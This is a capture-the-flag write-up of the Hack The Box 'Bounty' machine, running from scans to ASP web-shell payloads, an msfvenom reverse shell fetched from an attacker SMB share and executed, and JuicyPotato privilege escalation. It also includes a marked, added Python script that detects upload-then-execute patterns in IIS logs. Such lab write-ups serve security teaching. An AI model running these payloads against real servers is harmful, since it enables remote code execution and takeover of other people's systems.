Hack The Box: Bounty Write-up (#38)

Reconnaissance

./nmapAutomater 10.10.10.93 All
  • All: Runs all the scans consecutively (~20–30 minutes)
Running all scans on 10.10.10.93
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:39 +08
Warning: 10.10.10.93 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.93
Host is up (0.0088s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:40 +08
Nmap scan report for 10.10.10.93
Host is up (0.0087s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.87 seconds
----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:40 +08
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.45 seconds
---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:43 +08
Initiating Parallel DNS resolution of 1 host. at 07:43
Completed Parallel DNS resolution of 1 host. at 07:43, 0.20s elapsed
Initiating SYN Stealth Scan at 07:43
Scanning 10.10.10.93 [65535 ports]
Discovered open port 80/tcp on 10.10.10.93
SYN Stealth Scan Timing: About 11.44% done; ETC: 07:48 (0:04:00 remaining)
SYN Stealth Scan Timing: About 22.86% done; ETC: 07:47 (0:03:26 remaining)
SYN Stealth Scan Timing: About 34.29% done; ETC: 07:47 (0:02:54 remaining)
SYN Stealth Scan Timing: About 45.72% done; ETC: 07:47 (0:02:24 remaining)
SYN Stealth Scan Timing: About 57.14% done; ETC: 07:47 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.57% done; ETC: 07:47 (0:01:23 remaining)
SYN Stealth Scan Timing: About 80.00% done; ETC: 07:47 (0:00:53 remaining)
Completed SYN Stealth Scan at 07:47, 262.71s elapsed (65535 total ports)
Nmap scan report for 10.10.10.93
Host is up (0.0076s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.98 seconds
Raw packets sent: 131275 (5.776MB) | Rcvd: 207 (9.108KB)
No new ports
---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:47 +08
Nmap scan report for 10.10.10.93
Host is up (0.0069s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.22 seconds
Running Vuln scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:48 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.93
Host is up (0.0083s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2015-1635:
| VULNERABLE:
| Remote Code Execution in HTTP.sys (MS15-034)
| State: VULNERABLE
| IDs: CVE:CVE-2015-1635
| A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
| caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
| successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
|
| Disclosure date: 2015-04-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.27 seconds
---------------------Recon Recommendations----------------------
Web Servers Recon:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.aspx,.php -u http://10.10.10.93:80 -o recon/gobuster_10.10.10.93_80.txt
nikto -host 10.10.10.93:80 | tee recon/nikto_10.10.10.93_80.txt
Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>
Running Default in (21) s: All
---------------------Running Recon Commands----------------------
Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.93:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,asp,aspx,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 07:51:15 Starting gobuster
===============================================================
http://10.10.10.93:80/aspnet_client (Status: 301) [Size: 159]
http://10.10.10.93:80/transfer.aspx (Status: 200) [Size: 941]
http://10.10.10.93:80/uploadedfiles (Status: 301) [Size: 159]
===============================================================
2020/09/12 07:51:33 Finished
===============================================================
Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-09-12 07:51:34 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-09-12 07:52:51 (GMT8) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan

=========================



---------------------Finished all Nmap scans---------------------
  • Port 80: Running Microsoft IIS httpd 7.5.
  1. The only open port is 80, so the web server is our entry point. A quick Google search for IIS 7.5 indicates it is possibly running on Windows Server 2008 R2. The gobuster scan also returned two interesting paths on the web server, /transfer.aspx and /uploadedfiles. We'll enumerate manually to dig further.
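From the defender's side, the two paths gobuster found describe the whole chain: an upload form (/transfer.aspx) and a directory it writes into (/uploadedfiles) that IIS will happily serve. The script below is an added example, not part of this write-up, that correlates IIS W3C log records to flag a client that POSTs to /transfer.aspx and shortly afterwards requests a script-capable file from the upload directory; a request for such a file with no preceding upload is still reported at lower severity. Field names follow the standard IIS W3C log format; the sample log lines, the 10-minute window and the extension list are constructed assumptions.

```python
"""Detect an upload-then-execute sequence in IIS W3C logs (added example)."""
import os
from datetime import datetime, timedelta

UPLOAD_ENDPOINT = "/transfer.aspx"      # upload page found by gobuster
UPLOAD_DIR = "/uploadedfiles/"          # directory the upload lands in
# Extensions IIS hands to a script engine or treats as configuration; none of
# them belong in a directory that stores user uploads (assumed list).
EXECUTABLE_EXTS = {".asp", ".aspx", ".asa", ".ashx", ".asmx", ".config"}
WINDOW = timedelta(minutes=10)          # assumed correlation window

# Constructed sample in IIS W3C format; not real logs from the box.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-09-12 00:05:01 10.10.10.93 GET /transfer.aspx - 80 - 10.10.14.31 Mozilla/5.0 200 0 0 15
2020-09-12 00:05:09 10.10.10.93 POST /transfer.aspx - 80 - 10.10.14.31 Mozilla/5.0 200 0 0 40
2020-09-12 00:05:12 10.10.10.93 GET /uploadedfiles/cmd.asp - 80 - 10.10.14.31 Mozilla/5.0 200 0 0 120
2020-09-12 00:06:00 10.10.10.93 GET /uploadedfiles/photo.jpg - 80 - 10.10.14.50 Mozilla/5.0 200 0 0 3
2020-09-12 00:40:00 10.10.10.93 GET /uploadedfiles/report.aspx - 80 - 10.10.14.77 Mozilla/5.0 404 0 2 5
2020-09-12 00:41:30 10.10.10.93 POST /transfer.aspx - 80 - 10.10.14.50 Mozilla/5.0 200 0 0 35
"""


def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#") or fields is None:
            continue                      # other directives, or no header yet
        values = line.split()
        if len(values) != len(fields):
            continue                      # malformed record; skip rather than misalign
        yield dict(zip(fields, values))


def find_upload_execution(text, window=WINDOW):
    """Return alerts for script-capable files requested from the upload directory.

    Severity is 'high' when the same client POSTed to the upload page within
    `window` beforehand, 'medium' otherwise.
    """
    last_post = {}                        # client IP -> time of last upload POST
    alerts = []
    for rec in parse_w3c(text):
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        client = rec["c-ip"]
        stem = rec["cs-uri-stem"].lower()
        if rec["cs-method"].upper() == "POST" and stem == UPLOAD_ENDPOINT:
            last_post[client] = ts
            continue
        if not stem.startswith(UPLOAD_DIR):
            continue
        if os.path.splitext(stem)[1] not in EXECUTABLE_EXTS:
            continue                      # ordinary static content, e.g. images
        posted = last_post.get(client)
        linked = posted is not None and timedelta(0) <= ts - posted <= window
        alerts.append({
            "client": client,
            "time": rec["date"] + " " + rec["time"],
            "path": rec["cs-uri-stem"],
            "status": rec["sc-status"],
            "severity": "high" if linked else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_upload_execution(SAMPLE_LOG):
        print(alert)
```

Pointing the script at a real IIS log file instead of SAMPLE_LOG is a one-line change; the practical fix it supports is to strip script handlers from the upload directory in IIS and reject the listed extensions at upload time, so that a record matching this rule becomes an anomaly rather than a compromise.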

Service Enumeration

Port 80 (HTTP)

<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c whoami")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c systeminfo")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>

Exploitation

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exe
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c copy \\10.10.14.31\tools\shell.exe C:\Users\Public\shell.exe && cmd /c C:\Users\Public\shell.exe")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
python /usr/share/doc/python3-impacket/examples/smbserver.py tools .
nc -nlvp 53

Post-Exploitation Enumeration

whoami /priv

Privilege Escalation

copy \\10.10.14.31\tools\JuicyPotato.exe C:\Users\Public\JuicyPotato.exe
nc -nlvp 53
JuicyPotato.exe -l 1337 -p C:\Users\Public\shell.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

Attack Strategy Map

(Figure: attack strategy map image, not reproduced here.)

Joshua Surendran